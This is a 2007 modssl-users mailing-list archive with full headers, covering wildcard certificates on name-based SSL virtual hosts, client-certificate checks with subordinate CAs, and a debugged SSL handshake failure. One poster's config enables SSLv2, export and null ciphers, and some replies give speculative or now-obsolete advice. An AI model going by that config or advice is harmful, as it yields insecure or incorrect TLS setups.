RNBM-MSG08.mca.naspers.dom with Microsoft SMTPSVC(6.0.3790.1830); Wed, 14 Nov 2007 09:33:12 +0200 X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: Apache2, modssl and wildcard certificate Date: Wed, 14 Nov 2007 09:33:11 +0200 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Apache2, modssl and wildcard certificate Thread-Index: AcgmkJwiMt0J+HLxTwapN+EA9Kg2xg== From: "Wim Sturkenboom" To: X-OriginalArrivalTime: 14 Nov 2007 07:33:12.0323 (UTC) FILETIME=[9C85F530:01C82690] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Wim Sturkenboom" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8e DAV/2 PHP/5.2.3 Not sure if this belongs here or in another mailing list (apache). I like to know how I can setup subdomains with a wildcard certificate? 1) Originally I had a couple of websites with ssl (https), each site with its own ip-address and its own certificate. In an attempt to save on IP-addresses, I thought that subdomains and a wildcard certificate would allow me to use one ip-address (and therefore name-based virtual hosting). Is this the correct assumption? If it's correct, please read on. If this is not correct, what to do to get it working? 2) I've created a self-signed wildcard certificate. When I (re)start apache, the following warnings occur: [Wed Nov 14 07:34:33 2007] [warn] RSA server certificate CommonName (CN) `*.lbtd-techweb01' does NOT match server name!? [Wed Nov 14 07:34:33 2007] [warn] RSA server certificate CommonName (CN) `*.lbtd-techweb01' does NOT match server name!? [Wed Nov 14 07:34:33 2007] [warn] Init: SSL server IP/port conflict: cc.lbtd-techweb01:443 (/etc/httpd/extra/httpd-ssl.conf:52) vs. tac.lbtd-techweb01:443 (/etc/httpd/extra/httpd-ssl.conf:79) [Wed Nov 14 07:34:33 2007] [warn] Init: You should not use name-based virtual hosts in conjunction with SSL!! [Wed Nov 14 07:34:33 2007] [notice] Digest: generating secret for digest authentication ... [Wed Nov 14 07:34:33 2007] [notice] Digest: done [Wed Nov 14 07:34:34 2007] [warn] RSA server certificate CommonName (CN) `*.lbtd-techweb01' does NOT match server name!? [Wed Nov 14 07:34:34 2007] [warn] RSA server certificate CommonName (CN) `*.lbtd-techweb01' does NOT match server name!? [Wed Nov 14 07:34:34 2007] [warn] Init: SSL server IP/port conflict: cc.lbtd-techweb01:443 (/etc/httpd/extra/httpd-ssl.conf:52) vs. tac.lbtd-techweb01:443 (/etc/httpd/extra/httpd-ssl.conf:79) How do I get rid of the first 2 warnings (and the repeats later on for different subdomains)? Something I did wrong while creating the certificate? I do understand the cause of the third warning (and its repeats). This would imply that wildcard certificates and subdomains using name-based virtual hosting are not possible. Any way that I can work around this? This is (part of) my /etc/httpd/extra-httpd-ssl.conf NameVirtualHost *:443 Listen 443 AddType application/x-x509-ca-cert .crt AddType application/x-pkcs7-crl .crl SSLPassPhraseDialog builtin SSLSessionCache shmcb:/var/run/httpd/ssl_scache(512000) SSLSessionCacheTimeout 300 SSLMutex file: /var/run/httpd/ssl_mutex #no space between colon and first / # command centre # DocumentRoot "/home/cc/www/ils/web" ServerName cc.lbtd-techweb01 #ServerAlias cc.lbtd-techweb01 ServerAdmin wsturkenboom@multichoice.co.za ErrorLog /var/log/httpd/error_log TransferLog /var/log/httpd/access_log SSLEngine on SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL SSLCertificateFile /etc/httpd/certificates/lbtd-techweb01.crt SSLCertificateKeyFile /etc/httpd/certificates/lbtd-techweb01.key BrowserMatch ".*MSIE.*" \ =20 nokeepalive ssl-unclean-shutdown \ =20 downgrade-1.0 force-response-1.0 =20 =20 Order allow,deny =20 Allow from all =20 Wim Sturkenboom _________________________________________________________________________= ________________________________________ Information contained in any e-mail or attachment from Multichoice Africa= =20(Pty) Ltd (=93MCA=94) is confidential and may also be privileged or protected by other legal rules or law. You should not disse= minate, distribute or copy this e-mail. Any views or opinions presented in this email are solely those of the author and do= =20not necessarily represent those of MCA. Employees=20 of MCA are expressly required not to make defamatory statements and not t= o infringe or authorise any infringement of=20 copyright or any other legal right by email communications. Any such comm= unication is contrary to MCA=92s policy and outside the scope of the employment of the individual concerned. MCA will not acc= ept any liability in respect of such communication, and the employee responsible will be personally liable for= =20any damages or other liability arising from such communication. _________________________________________________________________________= ________________________________________ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Nov 15 00:31:40 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id E0CFD14D9EC; Thu, 15 Nov 2007 00:31:40 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from mail.dudelab.org (dudelab.org [212.12.33.202]) by master.modssl.org (Postfix) with ESMTP id 077CE14D83F for ; Thu, 15 Nov 2007 00:31:39 +0100 (CET) Received: from localhost (localhost [127.0.0.1]) by mail.dudelab.org (Postfix) with ESMTP id A43324BFBF for ; Thu, 15 Nov 2007 00:30:41 +0100 (CET) Received: from mail.dudelab.org ([127.0.0.1]) by localhost (dudelab [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id 30332-10 for ; Thu, 15 Nov 2007 00:30:41 +0100 (CET) Received: from [192.168.178.20] (p548E921F.dip0.t-ipconnect.de [84.142.146.31]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (Client CN "Olaf Gellert", Issuer "User CA" (verified OK)) by mail.dudelab.org (Postfix) with ESMTP id E91B14BFB8 for ; Thu, 15 Nov 2007 00:30:40 +0100 (CET) Message-ID: <473B854F.5070505@intrusion-lab.net> Date: Thu, 15 Nov 2007 00:31:27 +0100 From: Olaf Gellert User-Agent: Thunderbird 1.5.0.12 (X11/20060911) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Apache2, modssl and wildcard certificate References: In-Reply-To: X-Enigmail-Version: 0.94.1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Scanned: amavisd-new at dudelab.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Olaf Gellert X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Hi all, Wim Sturkenboom wrote: > 1) > Originally I had a couple of websites with ssl (https), each site with > its own ip-address and its own certificate. In an attempt to save on > IP-addresses, I thought that subdomains and a wildcard certificate would > allow me to use one ip-address (and therefore name-based virtual > hosting). > Is this the correct assumption? If it's correct, please read on. If this > is not correct, what to do to get it working? It will not work. An SSL connection has to be completely established before content is transmitted (which seems logical: First do authentication and do a key exchange to enable encryption, then send data over this encrypted and authenticated channel). The way name-based virtual hosts work is: The name of the requested server is written in the HTTP header which is transmitted after the connection establishment. The only thing that is available at SSL handshake is the IP-address (which may even be used by the client to do a reverse lookup and compare the DNS name with what is written in the certificate. So: multiple name-based virtual hosts with SSL will not work. For the second question: I am not sure how Apache handles this but I am pretty sure, that some browsers do not accept wildcard certificates, they require a complete match of the full DNS name (I think InternetExplorer still accepts wildcards). It may be that OpenSSL (and therefore all OpenSSL based applications) do not accept wildcard certificates... The wildcard thing is a bit of a "don't do that": What kind of authentication do you achieve if wildcards are allowed? In the times when wildcard certificates were quite common, there were some rules where in the DNS names the wildcards were allowed (eg nothing like "www.mydomain.*" or even not "*.*" etc), but my feeling is: No exceptions from the simplest rule: always use a correct certificate for the correct host. Yes, I know, of course it would come in handy to use only one IP address and have always the same (wildcard) certificate for all name-based virtual hosts. But it's not "good style". Cheers, Olaf -- Dipl.Inform. Olaf Gellert INTRUSION-LAB.NET Senior Researcher, www.intrusion-lab.net PKI - and IDS - Services olaf.gellert@intrusion-lab.net ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Nov 19 10:24:17 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id C5EAE14DA2F; Mon, 19 Nov 2007 10:24:17 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from rv-out-0910.google.com (rv-out-0910.google.com [209.85.198.187]) by master.modssl.org (Postfix) with ESMTP id 1D30714D83E for ; Mon, 19 Nov 2007 10:24:16 +0100 (CET) Received: by rv-out-0910.google.com with SMTP id k20so1368910rvb for ; Mon, 19 Nov 2007 01:24:09 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlemail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=RL6U5gzJcZiDbl4haYKfdhWtIbyI16Uv1k6m8t11/kY=; b=UQdCUpX4vs13D0QjZPmJYHXVarP5g45qt3vHvYU986VXd0KqQuzHUD2N2sIqtPKBs9RL8SvekyCxIjzi8gXIDq5kFXxgOx4wWRtYgDdW4z2SqjzFdldaEQzg1T6E0f1ogBlv8Ymbf1tG8fgmdWEFKj56JmlUOS+qqg3DM//EF14= DomainKey-Signature: a=rsa-sha1; c=nofws; d=googlemail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=rwDp7R1TrOxt8LIYmFrWRoCJ+8lNHVYDrbJ27tH+SiphA9HxRhhYW03Fu74ZQRTv5grR9g8rSlGIYTt/MZ+59HKzyb4zgM9UtD8oVTANgzkgQLHsQd4csxBuD0kff3cScczn6vEgHOLPAhW+OU6bYDT9LdR7DRVaadeZ/WYvJlU= Received: by 10.140.142.6 with SMTP id p6mr1564109rvd.1195464249372; Mon, 19 Nov 2007 01:24:09 -0800 (PST) Received: by 10.141.63.21 with HTTP; Mon, 19 Nov 2007 01:24:09 -0800 (PST) Message-ID: Date: Mon, 19 Nov 2007 09:24:09 +0000 From: "Anony Mouse" To: modssl-users@modssl.org Subject: Correct use of SSLVerifyClient and Sub-Ordinate CAs MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Anony Mouse" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users I've found myself in the same quandary as this guy [1]. My CA structure is as follows. - RootCA - SubCA1 - SubCA1 Server - SubCA1 Clients - SubCA2 - SubCA2 Server - SubCA2 Clients I have two HTTPS vhost containers. One which has a server certificate issued by SubCA1 and should only accept client certificates from SubCA1. Likewise, another for SubCA2, which should only accept client certificates from SubCA2. The only way I seem to reliably [2] allow IE and Firefox clients to connect to their respective servers is, in the instance of the first vhost, to reference RootCA + SubCA1 in SSLCACertificateFile and set SSLCACertificateFile to 2. However in the following scenarios clients with SubCA2 certificates are also able to connect, which would appear to negate the crux of SSLVerifyClient. a) Using openssl s_client with a client certificate on SubCA2 and -CAfile referencing RootCA + SubCA2 succeeds. b) Using Firefox with a client certificate on SubCA2 to connect to the SubCA2 hostname and once loaded then changing to the SubCA1 hostname also succeeds. I see that there's been the addition of the SSLCADNRequestFile directive in Apache 2.2.x, but I don't see how this relates to this particular problem. I also understand that I could narrow the problem by using SSLRequire directives and the %{SSL_CLIENT_I_DN} variable, but this seems a hackish solution to something that should be handled by SSLCACertificateFile alone. Is this a bug? Any advice is appreciated. I can provide further details about my Apache configs or logs if required. Regards, [1] http://www.mail-archive.com/modssl-users@modssl.org/msg17546.html [2] Without, like the aforementioned poster, receiving "unable to get issuer certificate" or Verify Depth errors ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Nov 25 05:56:59 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id B4CEE14D86E; Sun, 25 Nov 2007 05:56:59 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from wa-out-1112.google.com (wa-out-1112.google.com [209.85.146.182]) by master.modssl.org (Postfix) with ESMTP id 6E99214D850 for ; Sun, 25 Nov 2007 05:56:57 +0100 (CET) Received: by wa-out-1112.google.com with SMTP id j32so287351waf for ; Sat, 24 Nov 2007 20:56:50 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=YyHCigpRc94hJGzq0bpX3ZRdF5Bm/02OxDr3i3sxCkE=; b=MsetMynbmQVGz0Bvem6mWuRZrEe9q/MhBTYMo/fomYDr5WOnyLDixUb17h5vT3twkYMlHGETR9nvm/ib70Cixysk1nB9IG88OoYmkLm1sPxEmSJEtAkdWWwPJgK65gE1/qZnR5Dox8nynpDLGpSabsyusmL5Lo/7Pxa6fH0Rjfc= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=CHHZmd8ICUgpZtyTmfQUiYr4JCjqsKA5I/ZY4ORUIj8gW4EzLwU4OmbeTChLX6JtTGHzofItP4UEr/+O+rE9XbmyfKJrzmRMKJgnbLAS11GJZeSHy3k7+Mvr2rX6n34mZwIKkwCgesDf/a+CEJNqQYTUvDLf6U3sLwRfksih1NA= Received: by 10.114.80.4 with SMTP id d4mr1261802wab.1195966609353; Sat, 24 Nov 2007 20:56:49 -0800 (PST) Received: by 10.114.208.9 with HTTP; Sat, 24 Nov 2007 20:56:49 -0800 (PST) Message-ID: <3dd335570711242056w475d4557kfdbe592dd5dd9d2e@mail.gmail.com> Date: Sat, 24 Nov 2007 23:56:49 -0500 From: "Bob Johnson" To: modssl-users@modssl.org Subject: ssl handshake failure MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bob Johnson" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Hi. I'm running mod_ssl with apache 1.3. My setup consists of a couple of domains and 2 IP addresses. Each IP address has 2 or 3 name-based virtual hosts for HTTP, and a single HTTPS virtual host. the first HTTPS virtual host has been set up for a while, with no special configuration, and works great. the second HTTPS virtual host (on a different IP address) was just added, and does not work at all, despite sharing a nearly identical configuration to the first one. First off, here's the error. output from "openssl s_client -connect xx.xxx.xxx.91:443 -state -debug -msg": CONNECTED(00000003) SSL_connect:before/connect initialization write to 0x80bb680 [0x80bbd00] (124 bytes => 124 (0x7C)) 0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 39 00 00 .z....Q... ..9.. 0010 - 38 00 00 35 00 00 16 00-00 13 00 00 0a 07 00 c0 8..5............ 0020 - 00 00 33 00 00 32 00 00-2f 00 00 07 05 00 80 03 ..3..2../....... 0030 - 00 80 00 00 05 00 00 04-01 00 80 00 00 15 00 00 ................ 0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08 ......@......... 0050 - 00 00 06 04 00 80 00 00-03 02 00 80 37 bf 69 76 ............7.iv 0060 - 53 ce 0a d5 8c d5 78 8e-94 73 05 84 d7 13 d6 2a S.....x..s.....* 0070 - fe 77 b8 8b be b0 dc e2-72 5f 4f d3 .w......r_O. >>> SSL 2.0 [length 007a], CLIENT-HELLO 01 03 01 00 51 00 00 00 20 00 00 39 00 00 38 00 00 35 00 00 16 00 00 13 00 00 0a 07 00 c0 00 00 33 00 00 32 00 00 2f 00 00 07 05 00 80 03 00 80 00 00 05 00 00 04 01 00 80 00 00 15 00 00 12 00 00 09 06 00 40 00 00 14 00 00 11 00 00 08 00 00 06 04 00 80 00 00 03 02 00 80 37 bf 69 76 53 ce 0a d5 8c d5 78 8e 94 73 05 84 d7 13 d6 2a fe 77 b8 8b be b0 dc e2 72 5f 4f d3 SSL_connect:SSLv2/v3 write client hello A read from 0x80bb680 [0x80c1260] (7 bytes => 4 (0x4)) 0000 - 68 69 55 53 hiUS read from 0x80bb680 [0x80c1264] (3 bytes => 0 (0x0)) 15772:error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure:s23_lib.c:188: output from "openssl s_client -connect xx.xxx.xxx.91:443 -state -debug -msg -ssl3": CONNECTED(00000003) SSL_connect:before/connect initialization write to 0x80bb680 [0x80c59e8] (89 bytes => 89 (0x59)) 0000 - 16 03 00 00 54 01 00 00-50 03 00 47 48 fc 0b c5 ....T...P..GH... 0010 - 9e 29 80 53 0f d4 59 10-3c ec 31 f1 cf e9 c2 4b .).S..Y.<.1....K 0020 - 69 02 54 a7 fb 5d 6a 64-b7 c9 9c 00 00 28 00 39 i.T..]jd.....(.9 0030 - 00 38 00 35 00 16 00 13-00 0a 00 33 00 32 00 2f .8.5.......3.2./ 0040 - 00 07 00 05 00 04 00 15-00 12 00 09 00 14 00 11 ................ 0050 - 00 08 00 06 00 03 02 01- ........ 0059 - >>> SSL 3.0 Handshake [length 0054], ClientHello 01 00 00 50 03 00 47 48 fc 0b c5 9e 29 80 53 0f d4 59 10 3c ec 31 f1 cf e9 c2 4b 69 02 54 a7 fb 5d 6a 64 b7 c9 9c 00 00 28 00 39 00 38 00 35 00 16 00 13 00 0a 00 33 00 32 00 2f 00 07 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 02 01 00 SSL_connect:SSLv3 write client hello A read from 0x80bb680 [0x80c11d8] (5 bytes => 4 (0x4)) 0000 - 68 69 55 53 hiUS read from 0x80bb680 [0x80c11dc] (1 bytes => 0 (0x0)) SSL_connect:failed in SSLv3 read server hello A 18042:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:s3_pkt.c:534: output from "curl https://secure.my2ndwebsite.com --trace ssl.trace": == Info: About to connect() to secure.2ndmywebsite.com port 443 == Info: Trying xx.xxx.xxx.91... == Info: connected == Info: Connected to secure.my2ndwebsite.com (xx.xxx.xxx.91) port 443 == Info: successfully set certificate verify locations: == Info: CAfile: /usr/share/curl/curl-ca-bundle.crt CApath: none == Info: SSLv2, Client hello (1): <= Send SSL data, 130 bytes (0x82) 0000: 01 03 01 00 69 00 00 00 10 00 00 39 00 00 38 00 ....i......9..8. 0010: 00 35 00 00 16 00 00 13 00 00 0a 07 00 c0 00 00 .5.............. 0020: 33 00 00 32 00 00 2f 00 00 07 05 00 80 03 00 80 3..2../......... 0030: 00 00 66 00 00 05 00 00 04 01 00 80 08 00 80 00 ..f............. 0040: 00 63 00 00 62 00 00 61 00 00 15 00 00 12 00 00 .c..b..a........ 0050: 09 06 00 40 00 00 65 00 00 64 00 00 60 00 00 14 ...@..e..d..`... 0060: 00 00 11 00 00 08 00 00 06 04 00 80 00 00 03 02 ................ 0070: 00 80 4b 74 75 71 34 b5 f9 50 3a 63 91 a6 64 0f ..Ktuq4..P:c..d. 0080: f5 3a .: == Info: Unknown SSL protocol error in connection to secure.2ndmywebsite.com:443 == Info: Closing connection #0 Okay, now that you've got the error, here are some snippets from my httpd.conf. xx.xxx.xxx.90 is the one that's completely working (including HTTPS on https://secure.my1stwebsite.com), xx.xxx.xxx.91 works except for the HTTPS virtual host (as you can see above). Commented-out lines are things that I tried, but did not solve the problem: Listen xx.xxx.xxx.90:80 Listen xx.xxx.xxx.90:443 Listen xx.xxx.xxx.91:80 Listen xx.xxx.xxx.91:443 NameVirtualHost xx.xxx.xxx.90 NameVirtualHost xx.xxx.xxx.91 # I also tried using: # NameVirtualHost xx.xxx.xxx.91:80 # There are a number of virtual hosts on .90 configured like this ServerAdmin webmaster@my1stwebsite.com DocumentRoot /path/to/public_html Servername my1stwebsite.com ServerAlias www.my1stwebsite.com ServerAlias www2.my1stwebsite.com ScriptAlias /cgi-bin /path/to/cgi-bin # this one works fine ServerAdmin webmaster@secure.my1stwebsite.com DocumentRoot /path/to/public_html Servername secure.my1stwebsite.com ServerAlias www.secure.my1stwebsite.com ScriptAlias /cgi-bin /path/to/cgi-bin SSLEngine On SSLCertificateFile /path/to/secure.my1stwebsite.com.crt SSLCertificateKeyFile /path/to/secure.my1stwebsite.com.key SSLCertificateChainFile /path/to/EV_intermediate.crt # also works fine ServerAdmin webmaster@my2ndwebsite.com DocumentRoot /path/to/public_html Servername my2ndwebsite.com ServerAlias www.my2ndwebsite.com ScriptAlias /cgi-bin /path/to/cgi-bin # this, however, gives the error from above ServerAdmin webmaster@secure.my2ndwebsite.com DocumentRoot /path/to/public_html Servername secure.my2ndwebsite.com ServerAlias www.secure.my2ndwebsite.com ScriptAlias /cgi-bin /path/to/cgi-bin SSLEngine On SSLCertificateFile /path/to/secure.my2ndwebsite.com.crt SSLCertificateKeyFile /path/to/secure.my2ndwebsite.com.key SSLCertificateChainFile /path/to/EV_intermediate.crt # I also tried the following setting # SSLVerifyClient none This error occurs using my valid signed certificate (for "secure.my2ndwebsite.com"), as well as with various self-signed certs I've tried (using common names such as "*.my2ndwebsite.com" and "xx.xxx.xxx.91"). I've been pounding my head against the wall for days over this problem. Any clues? Thanks a lot! - Jason ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Nov 25 10:17:07 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 1C2E314D86E; Sun, 25 Nov 2007 10:17:07 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from cr.toftum.org (cpe.atm2-0-76391.0x535ae692.bynxx16.customer.tele.dk [83.90.230.146]) by master.modssl.org (Postfix) with ESMTP id 08EA814D850 for ; Sun, 25 Nov 2007 10:17:05 +0100 (CET) Received: from localhost (localhost [127.0.0.1]) by cr.toftum.org (Postfix) with ESMTP id 08FF7449203 for ; Sun, 25 Nov 2007 10:16:58 +0100 (CET) X-Virus-Scanned: amavisd-new at toftum.dk Received: from cr.toftum.org ([127.0.0.1]) by localhost (cr.toftum.org [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id iPXGnl2T1y2g for ; Sun, 25 Nov 2007 10:16:44 +0100 (CET) Received: by cr.toftum.org (Postfix, from userid 1000) id 35745449171; Sun, 25 Nov 2007 10:16:44 +0100 (CET) Date: Sun, 25 Nov 2007 10:16:43 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: ssl handshake failure Message-ID: <20071125091643.GE20505@cr> Mail-Followup-To: modssl-users@modssl.org References: <3dd335570711242056w475d4557kfdbe592dd5dd9d2e@mail.gmail.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3dd335570711242056w475d4557kfdbe592dd5dd9d2e@mail.gmail.com> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users On Sat, Nov 24, 2007 at 11:56:49PM -0500, Bob Johnson wrote: > >>> SSL 2.0 [length 007a], CLIENT-HELLO > 01 03 01 00 51 00 00 00 20 00 00 39 00 00 38 00 > 00 35 00 00 16 00 00 13 00 00 0a 07 00 c0 00 00 > 33 00 00 32 00 00 2f 00 00 07 05 00 80 03 00 80 > 00 00 05 00 00 04 01 00 80 00 00 15 00 00 12 00 > 00 09 06 00 40 00 00 14 00 00 11 00 00 08 00 00 > 06 04 00 80 00 00 03 02 00 80 37 bf 69 76 53 ce > 0a d5 8c d5 78 8e 94 73 05 84 d7 13 d6 2a fe 77 > b8 8b be b0 dc e2 72 5f 4f d3 > SSL_connect:SSLv2/v3 write client hello A > read from 0x80bb680 [0x80c1260] (7 bytes => 4 (0x4)) > 0000 - 68 69 55 53 hiUS > read from 0x80bb680 [0x80c1264] (3 bytes => 0 (0x0)) > 15772:error:140790E5:SSL routines:SSL23_WRITE:ssl handshake > failure:s23_lib.c:188: > What version of openssl are you using? Try adding the following line to that failing vhost: SSLCipherSuite ALL:!SSLv2 (You probably want to tune it more later if you care about the security, but the important thing here is to get rid of SSLv2) To see which ciphers this opens up, run openssl ciphers -v 'ALL:!SSLv2' vh Mads Toftum -- http://soulfood.dk ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Nov 25 22:50:50 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 1EB4714D8A3; Sun, 25 Nov 2007 22:50:50 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from nz-out-0506.google.com (nz-out-0506.google.com [64.233.162.225]) by master.modssl.org (Postfix) with ESMTP id 9293814D850 for ; Sun, 25 Nov 2007 22:50:48 +0100 (CET) Received: by nz-out-0506.google.com with SMTP id i11so139154nzh for ; Sun, 25 Nov 2007 13:50:40 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; bh=JXwn6cc3Mx348jiZBfal0kPz3LBzcignCj2d3jjwJac=; b=kZNc5wjwA02PU+IcNvU9FKEXvlJbD1bo0X4TTj7tkkRY9fewcsP3eg+hpT5okZ475F9mNjuBqITOpJHSXPTbeFQvtTIAaXmNoUvw/hOcPrQbX2jcEHIPF4oRzcT9NjXg+ka6FZBr1NNcDfLlpqiDyCd7LaxZwmLmlVJGd0V17XU= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=nh4a9zTSf2X3CZ+7u6pzppDNgEQ5tDgl7EwxFZHrim5t0MmxNBpHVnR0h3yNg8MHYZaxLUzcUySYOOBUVI578NOmr/nIiAOe1czTon1gGT1he8/sXKN3fyRsTekQLdU5G1+fteaVJhVTu4USOynEa3TTOXWPXa15BgDl9FMc6Qs= Received: by 10.114.194.1 with SMTP id r1mr922103waf.1196027439996; Sun, 25 Nov 2007 13:50:39 -0800 (PST) Received: by 10.114.208.9 with HTTP; Sun, 25 Nov 2007 13:50:39 -0800 (PST) Message-ID: <3dd335570711251350y715d64fbka12d6c7f6c2b420d@mail.gmail.com> Date: Sun, 25 Nov 2007 16:50:39 -0500 From: Jason To: modssl-users@modssl.org Subject: Re: ssl handshake failure In-Reply-To: <20071125091643.GE20505@cr> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <3dd335570711242056w475d4557kfdbe592dd5dd9d2e@mail.gmail.com> <20071125091643.GE20505@cr> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Jason X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users On Nov 25, 2007 4:16 AM, Mads Toftum wrote: > What version of openssl are you using? > Try adding the following line to that failing vhost: > > SSLCipherSuite ALL:!SSLv2 > > (You probably want to tune it more later if you care about the security, > but the important thing here is to get rid of SSLv2) > To see which ciphers this opens up, run openssl ciphers -v 'ALL:!SSLv2' Thanks for the reply. Alas, still doesn't work. I forgot to mention that I tried setting the SSLCipherSuite to pretty much everything. All of them (SSLv2, SSLv3, TLSv1) give the same error. I also tried the "openssl s_client" command using "-cipher" set to LOW, MEDIUM, and HIGH. All give the same error, although the amount of time it takes before the error appears differs. Also tried setting SSLProtocol to each possible option. I am using OpenSSL 0.9.8d - Jason ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Nov 30 06:05:24 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 6041314DA27; Fri, 30 Nov 2007 06:05:24 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from sj-iport-3.cisco.com (sj-iport-3-in.cisco.com [171.71.176.72]) by master.modssl.org (Postfix) with ESMTP id 29DF314D83E for ; Fri, 30 Nov 2007 06:05:21 +0100 (CET) Received: from sj-dkim-4.cisco.com ([171.71.179.196]) by sj-iport-3.cisco.com with ESMTP; 29 Nov 2007 21:05:13 -0800 Received: from sj-core-2.cisco.com (sj-core-2.cisco.com [171.71.177.254]) by sj-dkim-4.cisco.com (8.12.11/8.12.11) with ESMTP id lAU55CPe026538 for ; Thu, 29 Nov 2007 21:05:12 -0800 Received: from xbh-sjc-221.amer.cisco.com (xbh-sjc-221.cisco.com [128.107.191.63]) by sj-core-2.cisco.com (8.12.10/8.12.6) with ESMTP id lAU55577029760 for ; Fri, 30 Nov 2007 05:05:12 GMT Received: from xmb-sjc-234.amer.cisco.com ([128.107.191.111]) by xbh-sjc-221.amer.cisco.com with Microsoft SMTPSVC(6.0.3790.1830); Thu, 29 Nov 2007 21:05:06 -0800 X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="----_=_NextPart_001_01C8330E.927EEA58" Subject: 